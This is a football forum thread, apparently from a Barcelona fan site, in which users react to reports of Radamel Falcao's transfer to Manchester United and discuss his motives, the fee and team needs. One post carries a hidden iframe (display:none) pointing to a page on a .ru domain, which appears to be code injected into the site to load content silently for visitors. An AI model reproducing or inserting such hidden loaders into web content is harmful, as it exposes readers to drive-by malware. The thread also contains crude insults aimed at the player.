Radamel Falcao

DonAndres

Wild Man of Borneo
Talented player but quite a whore. He'll sell out to whoever buys his rights or pays his lofty salary. I can't like the guy for the fact that his heart is in it purely for the money. If he goes to RM like this without regards to Atletico, my respect for him will fall hard.

F

Flavia

Wtf is going on why are we being linked to him, its hard enough fitting in what we have and not exactly a priority position.

It seems Van Persie will need knee surgery. From the mirror, no idea if reliable or not these days.
<iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe>

impeh

Hi, its me..
Certainly one of the Manchester clubs, according to sky sports

Apparently in Spain they think hes off to united, balague says it's for around 65m euros

Last edited:

BenRobbins

Everybody is reporting he has signed for Manchester United.Conflicting reports on if its a loan or permanent deal atm but wow what a signing. Falcao 9 :worthy:

GoobiePls

S&#9829;NE
Woodward just buying whatever big name is available I guess and hope Van Gaal "the genius" will magicly make a team from them

antonnn

Blue Blooded Aussie
holy mother of god we have bagged falcao, so excited, get the fuck in :worthy:
He won't make a giant difference though, you guys still failed to strengthen where you actually needed to the most. You'd have to hope you make some sort of much more necessary signing before the window is up. Obviously he's one you did need as Chicharito has been loaned to Madrid, but still. Better than nothing I guess.

Home of Barca Fans